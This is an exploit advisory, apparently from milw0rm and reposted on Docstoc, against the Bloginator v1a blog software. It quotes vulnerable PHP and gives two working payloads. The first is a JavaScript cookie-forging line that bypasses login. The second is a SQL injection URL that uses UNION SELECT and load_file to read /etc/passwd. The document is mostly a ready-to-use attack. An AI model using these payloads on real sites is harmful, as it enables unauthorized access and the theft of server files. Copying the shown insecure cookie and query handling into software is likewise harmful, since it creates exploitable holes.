Docstoc

Bloginator v1a Cookie BypassSQL Multiple Remote Vulnerabilities

Document Sample
Bloginator v1a Cookie BypassSQL Multiple Remote Vulnerabilities Powered By Docstoc
					                     Bloginator v1a Cookie BypassSQL Multiple Remote Vulnerabilities        Page 1/2
   1   ##########################################################################
   2
   3   Author = FireShot , Jacopo Vuga.
   4   Mail = fireshot<at>autistici<dot>org
   5
   6   Software = Bloginator V1A
   7   Download = http://kamads.com/kamads_ads/download.php?email=bloginator&ID=0
   8
   9   Greets to = Osirys, Myral, str0ke
  10
  11   ###########################################################################
  12
  13   Vulnerability = Insicure Cookie Handling
  14
  15   ###########################################################################
  16
  17   [CODE]
  18
  19   [URL] www.site.com/bloginator/articleCall.php
  20
  21   global $name,$password,$returnLink;
  22   $p_name = strip_tags(substr($_POST[’name’],0,32));
  23   $p_password = strip_tags(substr($_POST[’password’],0,32));
  24   if(crypt($p_name , $name) == $name and crypt($p_password,$password) == $password )
  25    {
  26
  27                setcookie("identifyYourself","you are identified");
  28                print "Login successfull<br>";
  29                print $returnLink;
  30           }
  31       else {print "Wrong username or password";
  32       }
  33   }
  34
  35   [/CODE]
  36
  37
  38   [EXPLOIT]
  39
  40   javascript:document.cookie = "identifyYourself=you+are+identified; path=/";
  41
  42   [/EXPLOIT]
  43
  44   ############################################################################
  45
  46   Vulnerability = SQL injection
  47
  48   ############################################################################
  49
  50   [CODE]
  51
  52   [URL] www.site.com/bloginator/articleCall.php
Fireshot                                                                                    03/19/2009
                    Bloginator v1a Cookie BypassSQL Multiple Remote Vulnerabilities                          Page 2/2
  53
  54   $action = @$_GET[’action’];
  55   [...]
  56   $id = $_GET[’id’];
  57   [...]
  58   function editArticle($id,$message)
  59   {
  60   global $returnLink;
  61   $query = "select * FROM articles WHERE id=’$id’";
  62   $sql = mysql_query($query) or die(mysql_query());
  63   $title = mysql_result($sql,0,’title’);
  64   $title = htmlentities($title);
  65   $article = mysql_result($sql,0,’article’);
  66   $article = htmlentities($article);
  67   $link = mysql_result($sql,0,’link’);
  68   $link = htmlentities($link);
  69
  70   startHTML("Edit ID # ".$id);
  71   ?>
  72
  73   [/CODE]
  74
  75   [EXPLOIT]
  76
  77   As Admin (Post Cookie exploit) you can inj arbitrary SQL code in the query.
  78
  79   www.site.com/action=edit&id=fireshot’ union select 1,2,3,4,load_file(’/etc/passwd’),6,7 order by ’*
  80
  81   [/EXPLOIT]
  82
  83   ##############################################################################
  84
  85   # milw0rm.com [2009−03−19]




Fireshot                                                                                                     03/19/2009

				
DOCUMENT INFO